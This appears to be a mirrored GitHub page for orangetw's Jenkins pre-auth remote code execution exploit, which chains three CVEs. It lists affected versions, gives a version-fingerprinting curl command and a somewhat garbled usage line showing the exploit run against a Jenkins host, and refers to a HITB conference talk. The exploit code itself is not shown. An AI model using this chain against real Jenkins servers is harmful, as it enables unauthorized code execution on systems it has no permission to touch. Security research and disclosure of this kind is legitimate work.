by orangetw

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

479 Stars 105 Forks Last release: Not found 9 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:


There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Affect list

  • ANONYMOUS_READ disable

    • Jenkins version < 2.138
  • ANONYMOUS_READ enable(or with a normal user account)

    • Jenkins build time < 2019-01-28


$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python http://jenkins/ 'curl' [] ANONYMOUS_READ disable! [] Bypass with CVE-2018-1000861! [*] Exploit success!(it should be :P)

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48


Part slides from my HITB AMS 2019 talk:

1.png 2.png 3.png


We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.